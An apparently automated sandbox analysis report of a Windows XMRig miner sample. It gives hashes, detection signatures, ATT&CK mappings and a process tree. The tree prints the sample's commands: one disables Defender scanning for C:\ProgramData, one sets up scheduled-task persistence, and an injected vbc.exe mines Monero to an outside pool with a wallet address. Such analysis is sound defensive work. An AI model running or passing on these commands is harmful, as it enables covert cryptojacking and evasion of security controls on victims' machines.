xmrig | 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

Analysis

max time kernel
83s
max time network
121s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
10-11-2022 19:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe
Size

1.1MB
MD5

19a474356662325b2059630216338194
SHA1

5537672751a37401bccf455f651d564bb314a924
SHA256

8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512

d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
SSDEEP

24576:8tPBwXgZiujGrs4EroJ7WtRDbQMPLqxpw3qt:CigZMsMN4v9jqxpwa

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/904-235-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/904-236-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/904-237-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/904-238-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/904-240-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/904-242-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

AVPTQBAEW.exe

pid process

4128 AVPTQBAEW.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

AVPTQBAEW.exe

description pid process target process

PID 4128 set thread context of 904 4128 AVPTQBAEW.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4268 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3688 timeout.exe

pid	process
4128	AVPTQBAEW.exe

description	pid	process	target process
PID 4128 set thread context of 904	4128	AVPTQBAEW.exe	vbc.exe

pid	process
4268	schtasks.exe

pid	process
3688	timeout.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exeAVPTQBAEW.exe

pid	process
1816	powershell.exe
1816	powershell.exe
1816	powershell.exe
3356	powershell.exe
3356	powershell.exe
3356	powershell.exe
4128	AVPTQBAEW.exe
4128	AVPTQBAEW.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

620

pid	process
620

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exepowershell.exeAVPTQBAEW.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	520	8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeIncreaseQuotaPrivilege	1816	powershell.exe
Token: SeSecurityPrivilege	1816	powershell.exe
Token: SeTakeOwnershipPrivilege	1816	powershell.exe
Token: SeLoadDriverPrivilege	1816	powershell.exe
Token: SeSystemProfilePrivilege	1816	powershell.exe
Token: SeSystemtimePrivilege	1816	powershell.exe
Token: SeProfSingleProcessPrivilege	1816	powershell.exe
Token: SeIncBasePriorityPrivilege	1816	powershell.exe
Token: SeCreatePagefilePrivilege	1816	powershell.exe
Token: SeBackupPrivilege	1816	powershell.exe
Token: SeRestorePrivilege	1816	powershell.exe
Token: SeShutdownPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeSystemEnvironmentPrivilege	1816	powershell.exe
Token: SeRemoteShutdownPrivilege	1816	powershell.exe
Token: SeUndockPrivilege	1816	powershell.exe
Token: SeManageVolumePrivilege	1816	powershell.exe
Token: 33	1816	powershell.exe
Token: 34	1816	powershell.exe
Token: 35	1816	powershell.exe
Token: 36	1816	powershell.exe
Token: SeDebugPrivilege	4128	AVPTQBAEW.exe
Token: SeDebugPrivilege	3356	powershell.exe
Token: SeIncreaseQuotaPrivilege	3356	powershell.exe
Token: SeSecurityPrivilege	3356	powershell.exe
Token: SeTakeOwnershipPrivilege	3356	powershell.exe
Token: SeLoadDriverPrivilege	3356	powershell.exe
Token: SeSystemProfilePrivilege	3356	powershell.exe
Token: SeSystemtimePrivilege	3356	powershell.exe
Token: SeProfSingleProcessPrivilege	3356	powershell.exe
Token: SeIncBasePriorityPrivilege	3356	powershell.exe
Token: SeCreatePagefilePrivilege	3356	powershell.exe
Token: SeBackupPrivilege	3356	powershell.exe
Token: SeRestorePrivilege	3356	powershell.exe
Token: SeShutdownPrivilege	3356	powershell.exe
Token: SeDebugPrivilege	3356	powershell.exe
Token: SeSystemEnvironmentPrivilege	3356	powershell.exe
Token: SeRemoteShutdownPrivilege	3356	powershell.exe
Token: SeUndockPrivilege	3356	powershell.exe
Token: SeManageVolumePrivilege	3356	powershell.exe
Token: 33	3356	powershell.exe
Token: 34	3356	powershell.exe
Token: 35	3356	powershell.exe
Token: 36	3356	powershell.exe
Token: SeLockMemoryPrivilege	904	vbc.exe
Token: SeLockMemoryPrivilege	904	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

904 vbc.exe

pid	process
904	vbc.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.execmd.exeAVPTQBAEW.execmd.exe

description	pid	process	target process
PID 520 wrote to memory of 1816	520	8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe	powershell.exe
PID 520 wrote to memory of 1816	520	8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe	powershell.exe
PID 520 wrote to memory of 4828	520	8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe	cmd.exe
PID 520 wrote to memory of 4828	520	8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe	cmd.exe
PID 4828 wrote to memory of 3688	4828	cmd.exe	timeout.exe
PID 4828 wrote to memory of 3688	4828	cmd.exe	timeout.exe
PID 4828 wrote to memory of 4128	4828	cmd.exe	AVPTQBAEW.exe
PID 4828 wrote to memory of 4128	4828	cmd.exe	AVPTQBAEW.exe
PID 4128 wrote to memory of 3356	4128	AVPTQBAEW.exe	powershell.exe
PID 4128 wrote to memory of 3356	4128	AVPTQBAEW.exe	powershell.exe
PID 4128 wrote to memory of 2732	4128	AVPTQBAEW.exe	cmd.exe
PID 4128 wrote to memory of 2732	4128	AVPTQBAEW.exe	cmd.exe
PID 2732 wrote to memory of 4268	2732	cmd.exe	schtasks.exe
PID 2732 wrote to memory of 4268	2732	cmd.exe	schtasks.exe
PID 4128 wrote to memory of 904	4128	AVPTQBAEW.exe	vbc.exe
PID 4128 wrote to memory of 904	4128	AVPTQBAEW.exe	vbc.exe
PID 4128 wrote to memory of 904	4128	AVPTQBAEW.exe	vbc.exe
PID 4128 wrote to memory of 904	4128	AVPTQBAEW.exe	vbc.exe
PID 4128 wrote to memory of 904	4128	AVPTQBAEW.exe	vbc.exe
PID 4128 wrote to memory of 904	4128	AVPTQBAEW.exe	vbc.exe
PID 4128 wrote to memory of 904	4128	AVPTQBAEW.exe	vbc.exe
PID 4128 wrote to memory of 904	4128	AVPTQBAEW.exe	vbc.exe
PID 4128 wrote to memory of 904	4128	AVPTQBAEW.exe	vbc.exe
PID 4128 wrote to memory of 904	4128	AVPTQBAEW.exe	vbc.exe
PID 4128 wrote to memory of 904	4128	AVPTQBAEW.exe	vbc.exe
PID 4128 wrote to memory of 904	4128	AVPTQBAEW.exe	vbc.exe
PID 4128 wrote to memory of 904	4128	AVPTQBAEW.exe	vbc.exe
PID 4128 wrote to memory of 904	4128	AVPTQBAEW.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe
"C:\Users\Admin\AppData\Local\Temp\8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9CB2.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:4828

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:3688

C:\ProgramData\WindowsMail\AVPTQBAEW.exe
"C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
5⤵
- Creates scheduled task(s)
PID:4268

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:904

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\WindowsMail\AVPTQBAEW.exe

Filesize
1.1MB

MD5
19a474356662325b2059630216338194

SHA1
5537672751a37401bccf455f651d564bb314a924

SHA256
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

SHA512
d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

Download Submit
C:\ProgramData\WindowsMail\AVPTQBAEW.exe

Filesize
1.1MB

MD5
19a474356662325b2059630216338194

SHA1
5537672751a37401bccf455f651d564bb314a924

SHA256
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

SHA512
d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
28c9fcd4f5595c2fcee67e3ca23d7586

SHA1
13cc462d741fca4a431c6e1e9aa24d91ce272e41

SHA256
8892662ba2f7e160cb68c7c8b71528052e9a641530ebdd609341dc27fbc3c831

SHA512
da0f15d05ebe59214d1b1c98fb88a13755393fe37b82b2e459e97d8856901119c0f7827def4da4d3efcb42f77084c5936dc1ac726f778df694b2e3fb01a5b066

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9CB2.tmp.bat

Filesize
149B

MD5
307d91e061f4b3fe0f1dde9aa70b7bb9

SHA1
a30822b2e5459759425d2608131013ce24bb305f

SHA256
edfc5b0662b4447a59ed2d8d3acd76a61ae2fa6cea05e61d949a4ae1daadc95b

SHA512
8c4818fb2afb50a702f391c0ea3f7457020840c096d18052214490d3a99f60bb0ee5439b66c8f09aad3304ca6267b7fb05a3f48ef67e1855f384fb1e0a770823

Download Submit
memory/520-127-0x00007FF8F25C0000-0x00007FF8F26B7000-memory.dmp

Filesize
988KB

Download
memory/520-131-0x0000000000170000-0x0000000000422000-memory.dmp

Filesize
2.7MB

Download
memory/520-126-0x00007FF8FAD80000-0x00007FF8FAD91000-memory.dmp

Filesize
68KB

Download
memory/520-124-0x00007FF8FBE70000-0x00007FF8FBE97000-memory.dmp

Filesize
156KB

Download
memory/520-129-0x0000000000170000-0x0000000000422000-memory.dmp

Filesize
2.7MB

Download
memory/520-128-0x00007FF8E2CE0000-0x00007FF8E36CC000-memory.dmp

Filesize
9.9MB

Download
memory/520-130-0x0000000001760000-0x00000000017A3000-memory.dmp

Filesize
268KB

Download
memory/520-125-0x00007FF8FBFD0000-0x00007FF8FC11A000-memory.dmp

Filesize
1.3MB

Download
memory/520-132-0x00007FF8F2290000-0x00007FF8F23BC000-memory.dmp

Filesize
1.2MB

Download
memory/520-139-0x0000000000170000-0x0000000000422000-memory.dmp

Filesize
2.7MB

Download
memory/520-140-0x0000000001760000-0x00000000017A3000-memory.dmp

Filesize
268KB

Download
memory/520-123-0x00007FF8FC980000-0x00007FF8FCA2E000-memory.dmp

Filesize
696KB

Download
memory/520-122-0x00007FF8FCD80000-0x00007FF8FCE1D000-memory.dmp

Filesize
628KB

Download
memory/520-121-0x00007FF8F5B50000-0x00007FF8F5BEC000-memory.dmp

Filesize
624KB

Download
memory/904-240-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/904-239-0x000002AF94810000-0x000002AF94830000-memory.dmp

Filesize
128KB

Download
memory/904-249-0x000002AF96180000-0x000002AF961A0000-memory.dmp

Filesize
128KB

Download
memory/904-248-0x000002AF96160000-0x000002AF96180000-memory.dmp

Filesize
128KB

Download
memory/904-247-0x000002AF96180000-0x000002AF961A0000-memory.dmp

Filesize
128KB

Download
memory/904-246-0x000002AF96160000-0x000002AF96180000-memory.dmp

Filesize
128KB

Download
memory/904-245-0x000002AF94880000-0x000002AF948C0000-memory.dmp

Filesize
256KB

Download
memory/904-242-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/904-235-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/904-236-0x0000000140343234-mapping.dmp

Download
memory/904-238-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/904-237-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1816-142-0x000001AD49E30000-0x000001AD49E52000-memory.dmp

Filesize
136KB

Download
memory/1816-146-0x000001AD62150000-0x000001AD621C6000-memory.dmp

Filesize
472KB

Download
memory/1816-133-0x0000000000000000-mapping.dmp

Download
memory/2732-195-0x0000000000000000-mapping.dmp

Download
memory/3356-190-0x0000000000000000-mapping.dmp

Download
memory/3688-143-0x0000000000000000-mapping.dmp

Download
memory/4128-187-0x00007FF8E2CE0000-0x00007FF8E36CC000-memory.dmp

Filesize
9.9MB

Download
memory/4128-179-0x00007FF8F5B50000-0x00007FF8F5BEC000-memory.dmp

Filesize
624KB

Download
memory/4128-225-0x00007FF8FAC30000-0x00007FF8FAC55000-memory.dmp

Filesize
148KB

Download
memory/4128-227-0x00007FF8DC840000-0x00007FF8DC90C000-memory.dmp

Filesize
816KB

Download
memory/4128-226-0x00007FF8F21C0000-0x00007FF8F21E5000-memory.dmp

Filesize
148KB

Download
memory/4128-228-0x00007FF8FC800000-0x00007FF8FC86C000-memory.dmp

Filesize
432KB

Download
memory/4128-229-0x00007FF8FA3B0000-0x00007FF8FA3E7000-memory.dmp

Filesize
220KB

Download
memory/4128-233-0x0000000001120000-0x00000000013D2000-memory.dmp

Filesize
2.7MB

Download
memory/4128-234-0x0000000000E00000-0x0000000000E43000-memory.dmp

Filesize
268KB

Download
memory/4128-189-0x00007FF8F2290000-0x00007FF8F23BC000-memory.dmp

Filesize
1.2MB

Download
memory/4128-188-0x0000000001120000-0x00000000013D2000-memory.dmp

Filesize
2.7MB

Download
memory/4128-174-0x0000000000000000-mapping.dmp

Download
memory/4128-180-0x00007FF8FCD80000-0x00007FF8FCE1D000-memory.dmp

Filesize
628KB

Download
memory/4128-186-0x00007FF8F25C0000-0x00007FF8F26B7000-memory.dmp

Filesize
988KB

Download
memory/4128-185-0x00007FF8FAD80000-0x00007FF8FAD91000-memory.dmp

Filesize
68KB

Download
memory/4128-241-0x0000000001120000-0x00000000013D2000-memory.dmp

Filesize
2.7MB

Download
memory/4128-184-0x00007FF8FBFD0000-0x00007FF8FC11A000-memory.dmp

Filesize
1.3MB

Download
memory/4128-183-0x00007FF8FBE70000-0x00007FF8FBE97000-memory.dmp

Filesize
156KB

Download
memory/4128-181-0x0000000000E00000-0x0000000000E43000-memory.dmp

Filesize
268KB

Download
memory/4128-182-0x00007FF8FC980000-0x00007FF8FCA2E000-memory.dmp

Filesize
696KB

Download
memory/4128-178-0x0000000001120000-0x00000000013D2000-memory.dmp

Filesize
2.7MB

Download
memory/4268-200-0x0000000000000000-mapping.dmp

Download
memory/4828-134-0x0000000000000000-mapping.dmp

Download